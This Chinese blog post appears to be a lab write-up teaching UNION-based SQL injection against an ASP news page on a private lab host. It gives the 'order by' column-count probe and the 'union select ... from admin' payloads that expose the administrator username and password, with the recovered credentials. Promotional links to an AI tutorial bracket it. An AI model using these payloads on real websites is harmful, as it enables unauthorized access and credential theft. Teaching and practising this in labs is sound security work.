分享一下我老师大神的人工智能教程!零基础,通俗易懂!http://blog.csdn.net/jiangjunshow
也欢迎大家转载本篇文章。分享知识,造福人民,实现我们中华民族伟大复兴!
**
实验目的:理解联合查询原理、学习联合查询过程
**实验原理:
1、链接后面添加【order by 11(数字任意)】根据页面返回结果,来判断站点中的字段数目
2、在链接后面添加语句【union select 1,2,3,4,5,6,7,8,9,10,11 from admin(表名)】进行联合查询,来暴露可查询的字段编号
3、根据上一步得到的字段编号,查询语句【union select 1,admin,password,4,5,6,7,8,9,10,11 from admin】直接暴露管理员用户名和密码
实验环境:
本机:192.168.1.2
目标机:192.168.1.3
一、检测字段长度
1、随便点击一个链接http://192.168.1.3:8008/onews.asp? id=45,在后面添加语句【order by 11】,页面显示正常 
2、同样添加【order by 12】页面报错,所以此站字段长度为11
二、暴露管理员用户、密码
1、在链接后面添加语句【union select 1,2,3,4,5,6,7,8,9,10,11 from admin】,页面显示数字为2和3 
2、在链接后面添加语句【union select 1,admin,password,4,5,6,7,8,9,10,11 from admin】即可暴露管理员用户名和密码 
3、到此,即可知道管理员用户名:admin和密码:bfpms
给我老师的人工智能教程打call!http://blog.csdn.net/jiangjunshow
